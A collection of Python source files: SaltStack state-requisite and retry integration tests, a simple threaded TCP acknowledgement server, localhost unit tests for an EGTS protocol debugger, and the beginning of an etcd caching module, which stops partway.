self.assertIn(expected_result, test_data)
def test_onchanges_requisite_no_state_module(self):
'''
Tests a simple state using the onchanges requisite without state modules
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple_no_state_module')
test_data = state_run['cmd_|-test_changing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
def test_onchanges_requisite_with_duration(self):
'''
Tests a simple state using the onchanges requisite
the state will not run but results will include duration
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onchanges_simple')
# Then, test the result of the state run when changes are not expected to happen
# and ensure duration is included in the results
test_data = state_run['cmd_|-test_non_changing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
# onfail tests
def test_onfail_requisite(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_multiple_onfail_requisite(self):
'''
        test to ensure the state is run even if only one
        of the onfail requisites fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_no_state_module(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple_no_state_module')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
def test_onfail_requisite_with_duration(self):
'''
Tests a simple state using the onfail requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_simple')
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']
self.assertIn('duration', test_data)
def test_multiple_onfail_requisite_with_required(self):
'''
test to ensure multiple states are run
when specified as onfails for a single state.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required')
retcode = state_run['cmd_|-b_|-echo b_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-c_|-echo c_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
retcode = state_run['cmd_|-d_|-echo d_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-b_|-echo b_|-run']['changes']['stdout']
self.assertEqual(stdout, 'b')
stdout = state_run['cmd_|-c_|-echo c_|-run']['changes']['stdout']
self.assertEqual(stdout, 'c')
stdout = state_run['cmd_|-d_|-echo d_|-run']['changes']['stdout']
self.assertEqual(stdout, 'd')
def test_multiple_onfail_requisite_with_required_no_run(self):
'''
test to ensure multiple states are not run
when specified as onfails for a single state
which fails.
This is a test for the issue:
https://github.com/saltstack/salt/issues/46552
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple_required_no_run')
expected = 'State was not run because onfail req did not change'
stdout = state_run['cmd_|-b_|-echo b_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-c_|-echo c_|-run']['comment']
self.assertEqual(stdout, expected)
stdout = state_run['cmd_|-d_|-echo d_|-run']['comment']
self.assertEqual(stdout, expected)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
        and resolves the magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
        and resolves the magic names state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
        test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
        test a state with the retry option that should return True after at least 4 retry attempts
        but never reach 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, which used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
file_name = os.path.join(TMP, 'nonbase_env')
state_run = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
state_id = 'file_|-test_file_|-{0}_|-managed'.format(file_name)
self.assertEqual(state_run[state_id]['comment'],
'File {0} updated'.format(file_name))
self.assertTrue(
state_run['file_|-test_file_|-{0}_|-managed'.format(file_name)]['result'])
self.assertTrue(os.path.isfile(file_name))
def _add_runtime_pillar(self, pillar):
'''
helper class to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test is set to true as an
arg post the state already being run previously
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
def test_issue_30161_unless_and_onlyif_together(self):
'''
        test file.managed states where unless and onlyif are used together in
        all four true/false combinations (issue #30161; see also issue #35384
        and its fix in PR #35545)
'''
sls = self.run_function('state.sls', mods='issue-30161')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless condition is true", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
_expected = {'file_|-unless_false_onlyif_false_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is false\nunless condition is false',
'name': '{0}/test.txt'.format(TMP),
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_false_onlyif_true_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'Empty file',
'pchanges': {},
'name': '{0}/test.txt'.format(TMP),
'start_time': '18:10:20.341753',
'result': True,
'changes': {'new': 'file {0}/test.txt created'.format(TMP)}},
'file_|-unless_true_onlyif_false_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is false\nunless condition is true',
'name': '{0}/test.txt'.format(TMP),
'start_time': '18:10:22.936446',
'skip_watch': True,
'changes': {},
'result': True},
'file_|-unless_true_onlyif_true_|-{0}/test.txt_|-managed'.format(TMP):
{'comment': 'onlyif condition is true\nunless condition is true',
'name': '{0}/test.txt'.format(TMP),
'skip_watch': True,
'changes': {},
'result': True}}
        for state_id in _expected:
            self.assertEqual(sls[state_id]['comment'], _expected[state_id]['comment'])
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
# remove testfile added in issue-30161.sls state file
state_file = os.path.join(TMP, 'test.txt')
if os.path.isfile(state_file):
os.remove(state_file)
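# For reference, a hedged sketch (not taken from the test suite) of what an
# SLS file such as requisites/onchanges_simple.sls exercised above might
# contain:
#
#   changing_state:
#     cmd.run:
#       - name: echo "Changed!"
#
#   test_changing_state:
#     cmd.run:
#       - name: echo "Success!"
#       - onchanges:
#         - cmd: changing_state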
|
tcpServer.py
|
#!/usr/bin/python
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip,bind_port))
server.listen(5)
print("[*] Listening on %s:%d" % (bind_ip,bind_port))
# this is our client-handling thread
def handle_client(client_socket):
#print out what the client sends
request = client_socket.recv(1024)
print("[*] Received: %s" % request)
#send back a packet
client_socket.send("ACK!")
client_socket.close()
while True:
client,addr = server.accept()
print("[*] Accepted connection from: %s:%d" % (addr[0],addr[1]))
    # spin up our client thread to handle incoming data
client_handler = threading.Thread(target=handle_client,args=(client,))
client_handler.start()
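
# A minimal client sketch (a hedged example, not part of the original script)
# to exercise the server above; run it from a separate process while the
# accept loop is listening:
#
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(("127.0.0.1", 9999))
#   client.send(b"Hello server")
#   response = client.recv(4096)
#   print("[*] Server replied: %s" % response)
#   client.close()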
|
test_passive_server_debugger.py
|
import socket
import threading
import time
import unittest
import sys
from io import StringIO
from egtsdebugger.passive_server_debugger import PassiveEgtsServerDebugger
from egtsdebugger.egts import *
auth_packet = b"\x01\x00\x00\x0b\x00\x0f\x00\x01\x00\x01\x06\x08\x00\x01\x00\x38\x01\x01\x05\x05\x00\x00\xef" \
b"\x03\x00\x00\x07\xcd"
incorrect_reply = bytes([1, 0, 3, 11, 0, 16, 0, 9, 0, 0, 167, 9, 0, 0, 6, 0, 9, 0, 24, 2, 2, 0, 3, 0, 9, 0, 0, 0, 196])
reply_packet = bytes([1, 0, 3, 11, 0, 16, 0, 9, 0, 0, 167, 9, 0, 0, 6, 0, 9, 0, 24, 2, 2, 0, 3, 0, 9, 0, 0, 0, 195])
class TestPassiveServerDebugger(unittest.TestCase):
"""Tests for EgtsPassiveServerDebugger class"""
def setUp(self):
self.port = 9093
self.host = 'localhost'
self.dispatcher = 1007
self.filename = 'data/2000_records.csv'
def test_connection_error(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_server_connection_error()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
self.assertEqual("ERROR. server has closed the connection. No packets were received.\n", output)
def test_incorrect_auth_message(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_server_incorrect_auth_message()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
self.assertEqual("ERROR. EGTS connection test failed: error parsing EGTS packet. Error code 128. Unsupported "
"protocol version (PRV not found).\n",
output)
def test_incorrect_dispatcher_type(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_server_incorrect_dispatcher_type()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """Dispatcher Type must be equal to 0. Currently it is equal to 1
Error validating first packet: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 1, did: 1007}]}]
ERROR. First packet is incorrect.
"""
self.assertEqual(msg, output)
def test_incorrect_dispatcher_id_message(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_server_incorrect_dispatcher_id_message()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """Expected Dispatcher ID = 1007 but got 2116
Error validating first packet: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, ID: 12, subrecords: [{Type: 5, dt: 0, did: 2116},{Type: 8},{Type: 8},{Type: 8},{Type: 8},{Type: 8}]}]
ERROR. First packet is incorrect.
"""
self.assertEqual(msg, output)
def test_success_1(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/1_record.csv")
        self.start_test_server_success(1)
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 1 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_success_5(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/5_records.csv")
        self.start_test_server_success(1)
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 5 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_success_2000(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_server_success(20)
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
SUCCESS. EGTS connection test succeeded. Sent 20 packets including 2000 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_incorrect_egts_reply(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread()
        self.start_test_incorrect_egts_reply()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
ERROR. EGTS connection test failed: error parsing EGTS packet. Error code 138. Data check sum error (Calculated crc: 49920, crc in packet: 50176).
"""
self.assertEqual(msg, output)
def test_unexpected_reply_success(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/5_records.csv")
        self.start_test_unexpected_reply_success()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
Warning: received unexpected replies: [9]
SUCCESS. EGTS connection test succeeded. Sent 1 packets including 5 records. Confirmation for all records were received.
"""
self.assertEqual(msg, output)
def test_unexpected_reply_failed(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/5_records.csv")
        self.start_test_unexpected_reply_failed()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
Warning: received unexpected replies: [9]
Error: did't receive reply on packets [1, 2, 3, 4, 5]
"""
self.assertEqual(msg, output)
def test_did_not_received_replies(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/5_records.csv")
        self.start_test_did_not_received_replies()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = """First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{Type: 5, dt: 0, did: 1007}]}]
ERROR. Sent 1 packets including 5 records, but received no replies from EGTS server.
"""
self.assertEqual(msg, output)
def test_socket_error(self):
old_stdout = sys.stdout
sys.stdout = mystdout = StringIO()
        server_thread = self.start_debugger_thread(filename="data/2000_records.csv")
        self.start_test_socket_error()
        server_thread.join()
output = mystdout.getvalue()
sys.stdout = old_stdout
msg = "First packet is correct: Packet ID: 1; Packet Type: 1; records: [{RecNum: 1, sst: 1, subrecords: [{" \
"Type: 5, dt: 0, did: 1007}]}]\nERROR. Got socket error:"
self.assertEqual(output.startswith(msg), True)
def start_debugger_thread(self, **kwargs):
        filename = kwargs.get('filename', self.filename)
egts_conn_test = PassiveEgtsServerDebugger(self.host, self.port, filename, self.dispatcher)
debug_thread = threading.Thread(target=egts_conn_test.start)
debug_thread.start()
time.sleep(0.00001)
return debug_thread
def start_test_server_connection_error(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.close()
def start_test_server_incorrect_auth_message(self):
sock = socket.socket()
sock.connect((self.host, self.port))
msg = bytes(555)
sock.send(msg)
sock.close()
def start_test_server_incorrect_dispatcher_type(self):
sock = socket.socket()
sock.connect((self.host, self.port))
auth_packet = b"\x01\x00\x00\x0b\x00\x0f\x00\x01\x00\x01\x06\x08\x00\x01\x00\x38\x01\x01\x05\x05\x00\x01\xef" \
b"\x03\x00\x00\x56\x67"
sock.send(auth_packet)
sock.close()
def start_test_server_incorrect_dispatcher_id_message(self):
sock = socket.socket()
sock.connect((self.host, self.port))
auth_packet = b"\x01\x00\x00\x0B\x00\x35\x00\x01\x00\x01\x2B\x26\x00\x01\x00\x85\x0C\x00\x00\x00\xC9\xD7\x22" \
b"\x12\x01\x01\x05\x05\x00\x00\x44\x08\x00\x00\x08\x03\x00\x01\x00\x00\x08\x03\x00\x02\x00\x00" \
b"\x08\x03\x00\x04\x80\x00\x08\x03\x00\x09\x80\x00\x08\x03\x00\x0A\x80\x00\xAE\xD8"
sock.send(auth_packet)
sock.close()
def start_test_server_success(self, num_of_packets):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
buff = b""
pid = 0
rid = 0
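        # accumulate stream bytes and peel complete EGTS packets off the
        # buffer one at a time; an EgtsParsingError means the buffer does not
        # yet hold a complete packet, so keep reading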
with sock:
while pid < num_of_packets:
data = sock.recv(1024)
buff = buff + data
try:
while len(buff) > 0:
egts = Egts(buff)
buff = egts.rest_buff
reply = egts.reply(pid, rid)
pid += 1
rid += 1
sock.send(reply)
except EgtsParsingError:
continue
def start_test_incorrect_egts_reply(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.send(incorrect_reply)
sock.close()
def start_test_unexpected_reply_success(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
data = sock.recv(1024)
egts = Egts(data)
reply = egts.reply(1, 1)
sock.send(reply_packet)
sock.send(reply)
sock.close()
def start_test_unexpected_reply_failed(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.send(reply_packet)
sock.close()
def start_test_did_not_received_replies(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.recv(1024)
sock.close()
def start_test_socket_error(self):
sock = socket.socket()
sock.connect((self.host, self.port))
sock.send(auth_packet)
sock.recv(1024)
sock.close()
def _parse_egts(self, data):
try:
self.egts = Egts(data)
except Exception as err:
self.fail("Error while parsing EGTS:" + str(err))
if __name__ == '__main__':
unittest.main()
|
etcd_cache.py
|
"""
Local Cache for ETCd values
"""
import etcd
from threading import Event, Thread
from time import sleep
from typing import Callable, List, Tuple, Union
from .general import isFunction
from .ext_dicts import FrozenDict, QueryDict
# Type Hinting
Callback = Callable[[FrozenDict], None]
Callbacks = Union[
List[Callback],
Tuple[Callback, ...]
]
class ReusableThread(Thread):
"""
Base: https://www.codeproject.com/Tips/1271787/Python-Reusable-Thread-Class
    This class provides code for a restartable / reusable thread
    join() will only wait for one (target) function call to finish
finish() will finish the whole thread (after that, it's not restartable anymore)
"""
def __init__(self, target: Callable, args: tuple = None, kwargs: dict = None):
self._startSignal = Event()
self._oneRunFinished = Event()
self._finishIndicator = False
self._callable = target
self._callableArgs = args or ()
self._callableKwargs = kwargs or {}
Thread.__init__(self)
def restart(self) -> None:
"""
make sure to always call join() before restarting
"""
self._startSignal.set()
def run(self) -> None:
"""
        This thread re-runs the target callable forever.
        Through start signals (and changes to the callable's input data)
        we can reuse the thread's resources
"""
self.restart()
while True:
# wait until we should process
self._startSignal.wait()
self._startSignal.clear()
if self._finishIndicator: # check, if we want to stop
self._oneRunFinished.set()
return
# call the threaded function
self._callable(*self._callableArgs, **self._callableKwargs)
# notify about the run's end
self._oneRunFinished.set()
def join(self, timeout: float = None) -> None:
"""
        This join will only wait for one single run (target function call) to be finished
"""
self._oneRunFinished.wait(timeout)
self._oneRunFinished.clear()
self.restart()
def finish(self) -> None:
self._finishIndicator = True
self.restart()
self.join(5)
class EtcdCache:
_callbacks: List[Callback]
_data: QueryDict
_etcd_client: etcd.Client
